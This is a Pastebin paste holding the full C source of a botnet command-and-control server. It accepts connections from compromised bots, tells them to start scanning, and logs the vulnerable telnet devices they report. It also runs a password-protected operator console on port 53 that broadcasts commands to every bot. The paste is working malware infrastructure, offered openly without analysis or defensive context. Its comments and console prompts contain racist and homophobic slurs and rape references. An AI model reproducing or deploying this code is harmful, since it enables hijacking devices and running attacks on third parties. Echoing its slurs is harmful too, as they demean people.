API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Dec 10th, 2016
79
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 22.30 KB | None | 0 0
raw download clone embed print report
  1. #include <stdio.h>
  2. #include <stdlib.h>
  3. #include <string.h>
  4. #include <sys/types.h>
  5. #include <sys/socket.h>
  6. #include <netdb.h>
  7. #include <unistd.h>
  8. #include <time.h>
  9. #include <fcntl.h>
  10. #include <sys/epoll.h>
  11. #include <errno.h>
  12. #include <pthread.h>
  13. #include <signal.h>
  14.  
  15. ////////////////////////////////////
  16. #define MY_MGM_PORT 53
  17. #define MAXFDS 1000000
  18. ////////////////////////////////////
  19.  
  20.  
  21. struct account {
  22. char id[20];
  23. char password[20];
  24. };
  25. static struct account accounts[10];
  26.  
  27. struct clientdata_t {
  28. uint32_t ip;
  29. char build[7];
  30. char connected;
  31. } clients[MAXFDS];
  32.  
  33. struct telnetdata_t {
  34. int connected;
  35. } managements[MAXFDS];
  36.  
  37.  
  38.  
  39. ////////////////////////////////////
  40.  
  41.  
  42. static volatile FILE *telFD;
  43. static volatile FILE *fileFD;
  44. static volatile int epollFD = 0;
  45. static volatile int listenFD = 0;
  46. static volatile int managesConnected = 0;
  47. static volatile int TELFound = 0;
  48. static volatile int scannerreport;
  49.  
  50.  
  51. ////////////////////////////////////
  52.  
  53.  
  54. int fdgets(unsigned char *buffer, int bufferSize, int fd)
  55. {
  56. int total = 0, got = 1;
  57. while(got == 1 && total < bufferSize && *(buffer + total - 1) != '\n') { got = read(fd, buffer + total, 1); total++; }
  58. return got;
  59. }
  60.  
  61. void trim(char *str) // Remove whitespace from a string and properly null-terminate it.
  62. {
  63. int i;
  64. int begin = 0;
  65. int end = strlen(str) - 1;
  66. while (isspace(str[begin])) begin++;
  67. while ((end >= begin) && isspace(str[end])) end--;
  68. for (i = begin; i <= end; i++) str[i - begin] = str[i];
  69. str[i - begin] = '\0';
  70. }
  71.  
  72.  
  73. static int make_socket_non_blocking (int sfd)
  74. {
  75. int flags, s;
  76. flags = fcntl (sfd, F_GETFL, 0);
  77. if (flags == -1)
  78. {
  79. perror ("fcntl");
  80. return -1;
  81. }
  82. flags |= O_NONBLOCK;
  83. s = fcntl (sfd, F_SETFL, flags);
  84. if (s == -1)
  85. {
  86. perror ("fcntl");
  87. return -1;
  88. }
  89. return 0;
  90. }
  91.  
  92.  
  93. static int create_and_bind (char *port)
  94. {
  95. struct addrinfo hints;
  96. struct addrinfo *result, *rp;
  97. int s, sfd;
  98. memset (&hints, 0, sizeof (struct addrinfo));
  99. hints.ai_family = AF_UNSPEC; /* Return IPv4 and IPv6 choices */
  100. hints.ai_socktype = SOCK_STREAM; /* We want a TCP socket */
  101. hints.ai_flags = AI_PASSIVE; /* All interfaces */
  102. s = getaddrinfo (NULL, port, &hints, &result);
  103. if (s != 0)
  104. {
  105. fprintf (stderr, "getaddrinfo: %s\n", gai_strerror (s));
  106. return -1;
  107. }
  108. for (rp = result; rp != NULL; rp = rp->ai_next)
  109. {
  110. sfd = socket (rp->ai_family, rp->ai_socktype, rp->ai_protocol);
  111. if (sfd == -1) continue;
  112. int yes = 1;
  113. if ( setsockopt(sfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)) == -1 ) perror("setsockopt");
  114. s = bind (sfd, rp->ai_addr, rp->ai_addrlen);
  115. if (s == 0)
  116. {
  117. break;
  118. }
  119. close (sfd);
  120. }
  121. if (rp == NULL)
  122. {
  123. fprintf (stderr, "Could not bind\n");
  124. return -1;
  125. }
  126. freeaddrinfo (result);
  127. return sfd;
  128. }
  129.  
  130. void broadcast(char *msg, int us) // sends message to all bots, notifies the management clients of this happening
  131. {
  132. int sendMGM = 1;
  133. if(strcmp(msg, "PING") == 0) sendMGM = 0; // Don't send pings to management. Why? Because a human is going to ignore it.
  134. char *wot = malloc(strlen(msg) + 10);
  135. memset(wot, 0, strlen(msg) + 10);
  136. strcpy(wot, msg);
  137. trim(wot);
  138. time_t rawtime;
  139. struct tm * timeinfo;
  140. time(&rawtime);
  141. timeinfo = localtime(&rawtime);
  142. char *timestamp = asctime(timeinfo);
  143. trim(timestamp);
  144. int i;
  145. for(i = 0; i < MAXFDS; i++)
  146. {
  147. if(i == us || (!clients[i].connected && (sendMGM == 0 || !managements[i].connected))) continue;
  148. if(sendMGM && managements[i].connected)
  149. {
  150. send(i, "\r\n", 2, MSG_NOSIGNAL);
  151. send(i, "\x1b[34m", 6, MSG_NOSIGNAL);
  152. send(i, timestamp, strlen(timestamp), MSG_NOSIGNAL);
  153. send(i, ":\x1b[37m ", 8, MSG_NOSIGNAL);
  154. } //just a prompt with a timestamp.
  155. printf("sent to fd: %d\n", i);
  156. send(i, msg, strlen(msg), MSG_NOSIGNAL);
  157. send(i, "\r\n", 2, MSG_NOSIGNAL);
  158. if(sendMGM && managements[i].connected) send(i, "[r00t@r4p3 ~]# ", 15, MSG_NOSIGNAL); // Send a new line to them faggots
  159. else send(i, "\n", 1, MSG_NOSIGNAL);
  160. }
  161. free(wot);
  162. }
  163.  
  164. void *epollEventLoop(void *useless)
  165. {
  166. struct epoll_event event;
  167. struct epoll_event *events;
  168. int s;
  169. events = calloc (MAXFDS, sizeof event);
  170. while (1)
  171. {
  172. int n, i;
  173. n = epoll_wait (epollFD, events, MAXFDS, -1);
  174. for (i = 0; i < n; i++)
  175. {
  176. if ((events[i].events & EPOLLERR) || (events[i].events & EPOLLHUP) || (!(events[i].events & EPOLLIN)))
  177. {
  178. clients[events[i].data.fd].connected = 0;
  179. close(events[i].data.fd);
  180. continue;
  181. }
  182. else if (listenFD == events[i].data.fd)
  183. {
  184. while (1)
  185. {
  186. struct sockaddr in_addr;
  187. socklen_t in_len;
  188. int infd, ipIndex;
  189.  
  190. in_len = sizeof in_addr;
  191. infd = accept (listenFD, &in_addr, &in_len); // accept a connection from a bot.
  192. if (infd == -1)
  193. {
  194. if ((errno == EAGAIN) || (errno == EWOULDBLOCK)) break;
  195. else
  196. {
  197. perror ("accept");
  198. break;
  199. }
  200. }
  201.  
  202. clients[infd].ip = ((struct sockaddr_in *)&in_addr)->sin_addr.s_addr;
  203.  
  204. int dup = 0;
  205. for(ipIndex = 0; ipIndex < MAXFDS; ipIndex++) // check for duplicate clients by seeing if any have the same IP as the one connecting
  206. {
  207. if(!clients[ipIndex].connected || ipIndex == infd) continue;
  208.  
  209. if(clients[ipIndex].ip == clients[infd].ip)
  210. {
  211. dup = 1;
  212. break;
  213. }
  214. }
  215.  
  216. if(dup)
  217. {
  218. printf("DUP Client - Terminating\n"); // warns the operator on command line
  219. if(send(infd, "!* QWAPKVTAYMEEB\n", 17, MSG_NOSIGNAL) == -1) { close(infd); continue; }
  220. if(send(infd, "NIGGERDUP\n", 10, MSG_NOSIGNAL) == -1) { close(infd); continue; }
  221. close(infd);
  222. continue;
  223. }
  224.  
  225. s = make_socket_non_blocking (infd);
  226. if (s == -1) { close(infd); break; }
  227.  
  228. event.data.fd = infd;
  229. event.events = EPOLLIN | EPOLLET;
  230. s = epoll_ctl (epollFD, EPOLL_CTL_ADD, infd, &event);
  231. if (s == -1)
  232. {
  233. perror ("epoll_ctl");
  234. close(infd);
  235. break;
  236. }
  237.  
  238. clients[infd].connected = 1;
  239. send(infd, "!* SCANNER ON\n", 14, MSG_NOSIGNAL);
  240. }
  241. continue;
  242. }
  243. else
  244. {
  245. int thefd = events[i].data.fd;
  246. struct clientdata_t *client = &(clients[thefd]);
  247. int done = 0;
  248. client->connected = 1;
  249. while (1)
  250. {
  251. ssize_t count;
  252. char buf[2048];
  253. memset(buf, 0, sizeof buf);
  254.  
  255. while(memset(buf, 0, sizeof buf) && (count = fdgets(buf, sizeof buf, thefd)) > 0)
  256. {
  257. if(strstr(buf, "\n") == NULL) { done = 1; break; }
  258. trim(buf);
  259. if(strcmp(buf, "PING") == 0) // basic IRC-like ping/pong challenge/response to see if server is alive
  260. {
  261. if(send(thefd, "PONG\n", 5, MSG_NOSIGNAL) == -1) { done = 1; break; } // response
  262. continue;
  263. }
  264. if(strstr(buf, "BUILD ") == buf)
  265. {
  266. char *build = strstr(buf, "BUILD ") + 7;
  267. if(strlen(build) > 7) { printf("build bigger then 6\n"); done = 1; break; }
  268. memset(client->build, 0, 7);
  269. strcpy(client->build, build);
  270. continue;
  271. }
  272. if(strstr(buf, "REPORT ") == buf) // received a report of a vulnerable system from a scan
  273. {
  274. char *line = strstr(buf, "REPORT ") + 7;
  275. fprintf(telFD, "%s\n", line); // let's write it out to disk without checking what it is!
  276. fflush(telFD);
  277. TELFound++;
  278. continue;
  279. }
  280. if(strstr(buf, "SCANNER STARTED!") == buf)
  281. {
  282. char *line = strstr(buf, "SCANNER STARTED!");
  283. scannerreport = 1;
  284. continue;
  285. }
  286. if(strstr(buf, "SCANNER STOPPED!") == buf)
  287. {
  288. char *line = strstr(buf, "SCANNER STOPPED!");
  289. scannerreport--;
  290. continue;
  291. }
  292. if(strcmp(buf, "PONG") == 0)
  293. {
  294. //should really add some checking or something but meh
  295. continue;
  296. }
  297.  
  298. printf("buf: \"%s\"\n", buf);
  299. }
  300.  
  301. if (count == -1)
  302. {
  303. if (errno != EAGAIN)
  304. {
  305. done = 1;
  306. }
  307. break;
  308. }
  309. else if (count == 0)
  310. {
  311. done = 1;
  312. break;
  313. }
  314. }
  315.  
  316. if (done)
  317. {
  318. client->connected = 0;
  319. close(thefd);
  320. }
  321. }
  322. }
  323. }
  324. }
  325.  
  326. unsigned int clientsConnected() // counts the number of bots
  327. {
  328. int i = 0, total = 0;
  329. for(i = 0; i < MAXFDS; i++)
  330. {
  331. if(!clients[i].connected) continue;
  332. total++;
  333. }
  334. return total;
  335. }
  336.  
  337. void *titleWriter(void *sock) // Information in the window title ya know
  338. {
  339. int thefd = (int)sock;
  340. char string[2048];
  341. while(1)
  342. {
  343. memset(string, 0, 2048);
  344. sprintf(string, "%c]0;Bots connected: %d | Operators: %d%c", '\033', clientsConnected(), managesConnected, '\007');
  345. if(send(thefd, string, strlen(string), MSG_NOSIGNAL) == -1) return;
  346.  
  347. sleep(2);
  348. }
  349. }
  350.  
  351. int Search_in_File(char *str)
  352. {
  353. FILE *fp;
  354. int line_num = 0;
  355. int find_result = 0, find_line=0;
  356. char temp[512];
  357.  
  358. if((fp = fopen("login.txt", "r")) == NULL){
  359. return(-1);
  360. }
  361. while(fgets(temp, 512, fp) != NULL){
  362. if((strstr(temp, str)) != NULL){
  363. find_result++;
  364. find_line = line_num;
  365. }
  366. line_num++;
  367. }
  368. if(fp)
  369. fclose(fp);
  370.  
  371. if(find_result == 0)return 0;
  372.  
  373. return find_line;
  374. }
  375.  
  376. void *telnetWorker(void *sock, void *telnetListener)
  377. {
  378. int thefd = (int)sock;
  379. int find_line;
  380. managesConnected++;
  381. pthread_t title;
  382. char counter[2048];
  383. memset(counter, 0, 2048);
  384. char buf[2048];
  385. char* nickstring;
  386. char* username;
  387. char* password;
  388. memset(buf, 0, sizeof buf);
  389. char botnet[2048];
  390. memset(botnet, 0, 2048);
  391.  
  392. //GET ACCOUNTS FROM FILE AND GIVE THEM MOTHERFUCKING IDZ
  393. FILE *fp;
  394. int i=0;
  395. int c;
  396. fp=fopen("login.txt", "r");
  397. while(!feof(fp))
  398. {
  399. c=fgetc(fp);
  400. ++i;
  401. }
  402. int j=0;
  403. rewind(fp);
  404. while(j!=i-1)
  405. {
  406. fscanf(fp, "%s %s", accounts[j].id, accounts[j].password);
  407. ++j;
  408. }
  409. //END FILE LOADING
  410.  
  411. if(send(thefd, "\x1b[32mNickname:\x1b[30m ", 22, MSG_NOSIGNAL) == -1) goto end;
  412. if(fdgets(buf, sizeof buf, thefd) < 1) goto end;
  413. trim(buf);
  414. nickstring = ("%s", buf);
  415. find_line = Search_in_File(nickstring);
  416. if(strcmp(nickstring, accounts[find_line].id) == 0){
  417. if(send(thefd, "\x1b[31m****************************************\r\n", 48, MSG_NOSIGNAL) == -1) goto end;
  418. if(send(thefd, "\x1b[32m* VALID USERNAME *\r\n", 48, MSG_NOSIGNAL) == -1) goto end;
  419. if(send(thefd, "\x1b[32mPassword:\x1b[30m ", 22, MSG_NOSIGNAL) == -1) goto end;
  420. if(fdgets(buf, sizeof buf, thefd) < 1) goto end;
  421. trim(buf);
  422. if(strcmp(buf, accounts[find_line].password) != 0) goto failed;
  423. memset(buf, 0, 2048);
  424. goto fak;
  425. }
  426. failed:
  427. if(send(thefd, "\033[1A", 5, MSG_NOSIGNAL) == -1) goto end;
  428. if(send(thefd, "\x1b[31m****************************************\r\n", 48, MSG_NOSIGNAL) == -1) goto end;
  429. if(send(thefd, "\x1b[31m* INVALID CREDENTIALS *\r\n", 48, MSG_NOSIGNAL) == -1) goto end;
  430. if(send(thefd, "\x1b[31m* FUCK OFF FAGGOT, LOGGED *\r\n", 48, MSG_NOSIGNAL) == -1) goto end;
  431. if(send(thefd, "\x1b[31m****************************************\r\n", 48, MSG_NOSIGNAL) == -1) goto end;
  432. sleep(5);
  433. goto end;
  434. fak:
  435. if(send(thefd, "\033[1A", 5, MSG_NOSIGNAL) == -1) goto end;
  436. if(send(thefd, "\x1b[1m\x1b[36m****************************************\r\n", 54, MSG_NOSIGNAL) == -1) goto end;
  437. if(send(thefd, "* \x1b[37mWELCOME TO THE R4P3R\x1b[36m *\r\n", 54, MSG_NOSIGNAL) == -1) goto end;
  438. if(send(thefd, "* \x1b[37m\x1b[31mIn the FBI we trust\x1b[31m\x1b[36m *\r\n", 74, MSG_NOSIGNAL) == -1) goto end;
  439. if(send(thefd, "* \x1b[37m\x1b[31mNow with Ceiling Fan support\x1b[31m\x1b[36m *\r\n", 74, MSG_NOSIGNAL) == -1) goto end;
  440. if(send(thefd, "******************************\r\n\x1b[36m\x1b[37m", 43, MSG_NOSIGNAL) == -1) goto end;
  441. pthread_create(&title, NULL, &titleWriter, sock);
  442. managements[thefd].connected = 1;
  443.  
  444. if(send(thefd, botnet, strlen(botnet), MSG_NOSIGNAL) == -1) return;
  445.  
  446. if(send(thefd, "\r\n[r00t@r4p3 ~]# ", 17, MSG_NOSIGNAL) == -1) goto end;
  447. while(fdgets(buf, sizeof buf, thefd) > 0)
  448. {
  449. if(strstr(buf, "!* STATUS"))
  450. {
  451. sprintf(botnet, "Telnet Devices: %d | Telnet Status: %d\r\n", TELFound, scannerreport);
  452. if(send(thefd, botnet, strlen(botnet), MSG_NOSIGNAL) == -1) return;
  453. }
  454. if(strstr(buf, "!* BOTS"))
  455. {
  456. sprintf(botnet, "Bots connected: %d | Operators: %d\r\n", clientsConnected(), managesConnected);
  457. if(send(thefd, botnet, strlen(botnet), MSG_NOSIGNAL) == -1) return;
  458. }
  459. trim(buf);
  460. if(send(thefd, "[r00t@r4p3 ~]# ", 15, MSG_NOSIGNAL) == -1) goto end;
  461. if(strlen(buf) == 0) continue;
  462. printf("%s: \"%s\"\n",accounts[find_line].id, buf);
  463. FILE *logFile;
  464. logFile = fopen("server.log", "a");
  465. fprintf(logFile, "%s: \"%s\"\n",accounts[find_line].id, buf);
  466. fclose(logFile);
  467. broadcast(buf, thefd);
  468. memset(buf, 0, 2048);
  469. }
  470.  
  471. end: // cleanup dead socket
  472. managements[thefd].connected = 0;
  473. close(thefd);
  474. managesConnected--;
  475. }
  476.  
  477. void *telnetListener(void *useless)
  478. {
  479. int sockfd, newsockfd;
  480. socklen_t clilen;
  481. struct sockaddr_in serv_addr, cli_addr;
  482. sockfd = socket(AF_INET, SOCK_STREAM, 0);
  483. if (sockfd < 0) perror("ERROR opening socket");
  484. bzero((char *) &serv_addr, sizeof(serv_addr));
  485. serv_addr.sin_family = AF_INET;
  486. serv_addr.sin_addr.s_addr = INADDR_ANY;
  487. serv_addr.sin_port = htons(MY_MGM_PORT);
  488. if (bind(sockfd, (struct sockaddr *) &serv_addr, sizeof(serv_addr)) < 0) perror("ERROR on binding");
  489. listen(sockfd,5);
  490. clilen = sizeof(cli_addr);
  491. while(1)
  492. {
  493. newsockfd = accept(sockfd, (struct sockaddr *) &cli_addr, &clilen);
  494. if (newsockfd < 0) perror("ERROR on accept");
  495. pthread_t thread;
  496. int a=pthread_create(&thread,NULL,&telnetWorker,(void *)newsockfd);
  497. }
  498. }
  499.  
  500. int main (int argc, char *argv[], void *sock)
  501. {
  502. signal(SIGPIPE, SIG_IGN); // ignore broken pipe errors sent from kernel
  503.  
  504. int s, threads;
  505. struct epoll_event event;
  506.  
  507. if (argc != 3)
  508. {
  509. fprintf (stderr, "Usage: %s [port] [threads]\n", argv[0]);
  510. exit (EXIT_FAILURE);
  511. }
  512. telFD = fopen("telnet.txt", "a+");
  513. threads = atoi(argv[2]);
  514.  
  515. listenFD = create_and_bind (argv[1]); // try to create a listening socket, die if we can't
  516. if (listenFD == -1) abort ();
  517.  
  518. s = make_socket_non_blocking (listenFD); // try to make it nonblocking, die if we can't
  519. if (s == -1) abort ();
  520.  
  521. s = listen (listenFD, SOMAXCONN); // listen with a huuuuge backlog, die if we can't
  522. if (s == -1)
  523. {
  524. perror ("listen");
  525. abort ();
  526. }
  527.  
  528. epollFD = epoll_create1 (0); // make an epoll listener, die if we can't
  529. if (epollFD == -1)
  530. {
  531. perror ("epoll_create");
  532. abort ();
  533. }
  534.  
  535. event.data.fd = listenFD;
  536. event.events = EPOLLIN | EPOLLET;
  537. s = epoll_ctl (epollFD, EPOLL_CTL_ADD, listenFD, &event);
  538. if (s == -1)
  539. {
  540. perror ("epoll_ctl");
  541. abort ();
  542. }
  543.  
  544. pthread_t thread[threads + 2];
  545. while(threads--)
  546. {
  547. pthread_create( &thread[threads + 1], NULL, &epollEventLoop, (void *) NULL); // make a thread to command each bot individually
  548. }
  549.  
  550. pthread_create(&thread[0], NULL, &telnetListener, (void *)NULL);
  551.  
  552. while(1)
  553. {
  554. broadcast("PING", -1); // ping bots every 60 sec on the main thread
  555. sleep(60);
  556. }
  557.  
  558. close (listenFD);
  559.  
  560. return EXIT_SUCCESS;
  561. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!